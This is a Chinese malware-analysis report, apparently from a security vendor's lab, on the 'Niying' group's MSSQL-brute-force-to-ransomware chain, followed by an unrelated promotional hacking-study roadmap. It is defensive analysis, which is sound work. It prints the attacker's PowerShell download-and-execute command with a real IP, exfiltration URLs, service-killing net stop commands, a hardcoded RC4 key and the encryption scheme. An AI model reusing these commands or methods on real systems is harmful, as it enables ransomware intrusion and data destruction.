
事件概述近期有客户反馈服务器文件被加密新华三攻防实验室立即响应。在排查过程中发现中毒主机上有大量MSSQL爆破日志及PowerShell运行日志。通过对日志及关联样本进行分析最终判定此次攻击为“匿影”组织所为。“匿影”组织于2019年3月份首次被披露从被披露的3年来该组织一直保持较高的活跃度变种也在持续升级。在早期活动中“匿影”使用永恒之蓝漏洞向受害者计算机植入挖矿病毒利用中毒主机资源挖取门罗币为主的加密数字货币。2020年4月份一场在全网大规模传播“WannaRen”勒索病毒事件引起广泛关注经溯源分析其幕后黑手正是“匿影”组织。12月份研究人员在“匿影”的攻击活动中发现了一个新的自称为CryptoJoker勒索模块索要赎金从“WannaRen”的0.05BTC涨至0.1BTC在随后的“匿影”攻击套件中还发现了文件窃密模块新的窃密模块主要对用户的虚拟货币钱包、密码等重要文件数据进行窃取。在国家对挖矿活动整治的背景下该组织成功拓展了勒索、窃密等能力。并且我们在之后的“匿影”组织攻击活动跟踪中发现多数事件均以勒索为目的表明该组织已经将重心从挖矿转向勒索攻击。匿影组织近年发起的主要攻击事件事件分析攻击流程新华三攻防实验室还原“匿影”完整勒索攻击过程样本分析初始入侵通过MSSQL扫描爆破获取中毒主机权限最终执行PowerShell指令下载cpu2.txt到本地执行解码为IEX((new-objectnet.webclient).downloadstring(‘http://185.198.166.202/cpu2.txt’))载荷下载cpu2.txt实际是powershell下载器下载各种文件至C:\Users\Public文件夹下下载完成后cpu2.txt会执行ms.exe。白加黑利用ms.exe主要负责执行lu.exe利用白加黑技术躲避杀软检测执行后续攻击。lu.exe是白文件原文件名Start.exeSandboxie相关包含有效证书。lu.exe会加载SbieDll.dll该dll为黑文件负责解密执行123.txt。勒索实施1、123.txt123.txt内容经过Base64编码解码后得到一个整型的宽字节数组。将该整数组转为bytes类型后得到一个未知类型文件经分析该文件由一段shellcode和一个恶意可执行PE文件“123_dump”组合构成。Shellcode用来解密出被混淆的API通过调用VirtualAllocVirtualProtect等API加载“123_dump”到新分配内存空间中执行。2、123_dump——解密执行shell.txt样本运行后首先会查找目录C:\users\public下是否有1949.txt该文件的存在是决定程序是否继续执行的标志但程序并未加载解析1949.txt的内容。进程提权程序会查询当前进程实现系统级别提权。解密shell.txt。程序会拼接当前程序目录C:\User\Public\shell.txt查找shell.txt,若文件存在则加载到申请的内存空间中。shell.txt本身是经过加密的文件无法直接执行。程序随即通过硬编码的解密算法字符串“RC4”和密钥“999888”作为参数传入sub_10001DFB函数中。经分析sub_10001DFB函数中不仅支持RC4算法解密还包括对RC2DES3DESAES192AES256以及对分组加密的五种模式CBCECBOFBCFBCTR进行解密。RC4解密完成后在新分配的内存空间中得到一个可执行PE文件。随后程序使用进程镂空方式将该恶意PE文件注入到系统程序servces.exe并执行。3、shell.txtshell.txt包含了11个子PE文件用以实现提权、终止进程、终止服务、加密文件的功能主要调用关系如下为方便描述将子PE文件命名为shell.txt.decrypted2.v~shell.txt.decrypted12.v具体分析见下文。1 shell.txt创建事件对象ezrxtcfyvgihuewawaeewekb判断是否有管理员权限取不同标识字符串管理员为“zzz”非管理员为“jjj”获取主机名、用户名、公网IP等信息与权限标识字符串拼接成一个字符串作为文件名称回传信息至hxxp://m.mssqlnewpro.com/mssqlzzz/upload.php然后创建cmd.exe或notepad.exe进程并注入恶意载荷shell.txt.decrypted.2.v实施勒索攻击。在非管理员权限下shell.txt释放C:\Users\Public\a.dll、C:\Users\Public\CVE20211675.exe、C:\Users\Public\MSFRottenPotato.exe等PE文件利用CVE-2021-1675、CVE-2021-1732、CVE-2022-21882等漏洞进行提权并重新执行lu.exe文件。2shell.txt.decrypted.2.v判断是否为管理员取不同标识字符串另外创建一个线程下载 hxxps://m.mssqlnewpro.com/admin.jpg 对其进行RC4解密key为999888然后通过进程注入执行。该解密方式和key与123.txt解密shell.txt一致。再次判断管理员权限如果是管理员则先删除之前下载的文件防止溯源分析部分如下然后依次注入执行 shell.txt.decrypted.3.v 、shell.txt.decrypted.4.v3shell.txt.decrypted.4.v——关闭进程和服务Microsoft Visual C/C(6.0 (1720-9782))[EXE32]创建事件对象 rsedtfyguhijoiy69ggjhhjggs464查找并关闭以下进程关闭以下服务通过命令行关闭大量数据库和数据备份相关服务及一些安全软件相关服务共183项NET stop MSSQL$SQLEXPRESS /YNET STOP acrsch2svc /YNET STOP acronisagent /YNET STOP arsm /YNET STOP FirebirdServerDefaultInstance /YNET STOP FirebirdGuardianDefaultInstance /YNET STOP MuzzleServer /Ysc stop “Acronis VSS Provider” /ysc stop “Enterprise Client Service” /ysc stop “Sophos Agent” /y……sc stop kavfsslp /ysc stop KAVFSGTsc stop KAVFS /ysc stop mfefire4shell.txt.decrypted.5.v——NTSD.exepdb path: ntsd.pdb是Windows自带的用户态调试工具可用于强制结束进程。5shell.txt.decrypted.3.v——执行加密操作判断是否为管理员是则创建事件对象 eyrwtyyweyetywetrey 不是则ewyrgrjhshasdftagdagere在以下字符中随机生成RC4和AES密钥密钥通过RSA公钥加密并base64编码保存删除卷影遍历各磁盘获取具有以下后缀的目标文件doc, docx, xls, dat, xlsx, ec, ppt, pptx, pst, ost, msg, eml, vsd,vsdx, txt, csv, rtf, 123, wks, wk1, pdf, dwg, onetoc2, snt, jpeg, jpg,docb, docm, dot, dotm, dotx, xlsm, xlsb, xlw, xlt, xlm, xlc, xltx,xltm, pptm, pot, pps, ppsm, ppsx, ppam, potx, potm, edb, hwp, 602,sxi, sti, sldx, sldm, vdi, vmdk, vmx, gpg, aes, ARC, PAQ, bz2, tbk,bak, tar, tgz, gz, 7z, rar, zip, backup, iso, vcd, bmp, png, gif, raw,cgm, tif, tiff, nef, psd, ai, svg, djvu, m4u, m3u, mid, wma, flv, 3g2,mkv, 3gp, mp4, mov, avi, asf, mpeg, vob, mpg, wmv, fla, swf, wav, mp3,sh, class, jar, java, rb, asp, php, jsp, brd, sch, dch, dip, pl, vb,vbs, ps1, bat, cmd, js, asm, h, pas, cpp, c, cs, suo, sln, ldf, mdf,ibd, myi, myd, frm, odb, dbf, db, mdb, accdb, sql, sqlitedb, sqlite3,asc, lay6, lay, mml, sxm, otg, odg, uop, std, sxd, otp, odp, wb2, slk,dif, stc, sxc, ots, ods, 3dm, max, 3ds, uot, stw, sxw, ott, odt, pem,p12, csr, crt, key, pfx, der排除包含以下字符串的文件路径加密逻辑当文件小于等于20000字节(约19KB)时使用RC4加密key为ksfdskjl81。当文件大于20000字节小于30000000字节(约19MB)时全部读取加密RC4加密全文件AES加密前20000字节(CBC不填充模式IV为0实际加密20016字节最后16字节为空)最后会附加16字节加密数据和684字节base64编码之后的RSA加密key。当文件大于等于30000000字节时只加密前30000000字节RC4加密前30000000字节AES加密前100000字节(CBC不填充模式IV为0实际加密100016字节最后16字节为空)后面保持原内容最后会附加16字节加密数据和684字节base64编码之后的RSA加密key。加密后缀为.locked被加密文件目录下会生成名为HOW_TO_DECRYPT.txt的勒索信。加密完成后会连接一次C2服务器回传相关信息和加密结果。“匿影”组织技术特点**入侵传播阶段“匿影”擅长在各大软件下载站、免费图床、网盘等公共基础网络上进行木马传播比如将伪装成BT下载器、激活工具程序的恶意代码上传至各大下载站。除此之外一些第三方公司网站也被“匿影”攻陷并充当木马下载服务器。另外“匿影”经常使用开源渗透工具Ladon对公网上的主机进行MS17-010漏洞利用、弱口令爆破等。载荷执行阶段该组织具有模块化开发的能力各组件分工明确。并且该组织注重躲避安全软件的检测其常用的免杀手段包括1无文件攻击。无论是在早期挖矿还是在后期勒索中当成功入侵到受害者主机后“匿影”惯用PowerShell来执行后续一系列攻击步骤包括其他恶意模块下载、加载执行、持久化等。2白加黑技术。利用白exe加载恶意dll来躲避安全软件检测该组织已使用过的白加黑利用手段有WINWODR.exe、Start.exe(Sandboxie)等。3加密混淆核心载荷。通过PowerShell脚本下载的载荷通常进行了加密混淆处理常使用Base64编码、逆序、字符类型转化、异或、RC4加密等。解密后的关键代码还会使用Themida壳或VMP壳进行保护最后再被命名为以.txt和.jpg为主的具有迷惑性的文件后缀。ATT CK分布图处置建议1、避免将重要服务映射至公网若业务需要请增加口令复杂度避免使用弱口令2、尽量通过官方下载渠道下载软件使用正版软件3、请及时更新系统补丁减少系统漏洞带来的风险4、重要文件请及时备份。最后网络安全需要学习那些知识网络安全零基础入门学习路线规划初级1、网络安全理论知识2天①了解行业相关背景前景确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。非常重要2、渗透测试基础一周①渗透测试的流程、分类、标准②信息收集技术主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理利用方法、工具MSF、绕过IDS和反病毒侦察④主机攻防演练MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础一周①Windows系统常见功能和命令②Kali Linux系统常见功能和命令③操作系统安全系统入侵排查/系统加固基础4、计算机网络基础一周①计算机网络基础、协议和架构②网络通信原理、OSI模型、数据转发流程③常见协议解析HTTP、TCP/IP、ARP等④网络攻击技术与网络安全防御技术⑤Web漏洞原理与防御主动/被动攻击、DDOS攻击、CVE漏洞复现5、数据库基础操作2天①数据库基础②SQL语言基础③数据库安全加固6、Web渗透1周①HTML、CSS和JavaScript简介②OWASP Top10③Web漏洞扫描工具④Web渗透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏扫等恭喜你如果学到这里你基本可以从事一份网络安全相关的工作比如渗透测试、Web 渗透、安全服务、安全分析等岗位如果等保模块学的好还可以从事等保工程师。薪资区间6k-15k到此为止大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗想要入坑黑客网络安全的朋友给大家准备了一份282G全网最全的网络安全资料包免费领取7、脚本编程初级/中级/高级在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中面对复杂多变的网络环境当常用工具不能满足实际需求的时候往往需要对现有工具进行扩展或者编写符合我们要求的工具、自动化脚本这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中想要高效地使用自制的脚本工具来实现各种目的更是需要拥有编程能力.零基础入门建议选择脚本语言Python/PHP/Go/Java中的一种对常用库进行编程学习 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP IDE强烈推荐Sublime ·Python编程学习学习内容包含语法、正则、文件、 网络、多线程等常用库推荐《Python核心编程》不要看完 ·用Python编写漏洞的exp,然后写一个简单的网络爬虫 ·PHP基本语法学习并书写一个简单的博客系统 熟悉MVC架构并试着学习一个PHP框架或者Python框架 (可选) ·了解Bootstrap的布局或者CSS。8、超级黑客这部分内容对零基础的同学来说还比较遥远就不展开细说了贴一个大概的路线。网络安全工程师企业级学习路线视频配套资料国内外网安书籍、文档工具当然除了有配套的视频同时也为大家整理了各种文档和书籍资料工具并且已经帮大家分好类了。一些我自己买的、其他平台白嫖不到的视频教程要学习网安其实不难难的是坚持和相信自己我的经验是既然已经选定网安你就要相信它相信它能成为你日后进阶的高效渠道这样自己才会更有信念去学习才能在碰到困难的时候坚持下去。机会属于有准备的人这是一个实力的时代。人和人之间的差距不在于智商而在于如何利用业余时间只要你想学习什么时候开始都不晚不要担心这担心那你只需努力剩下的交给时间这份完整版的学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】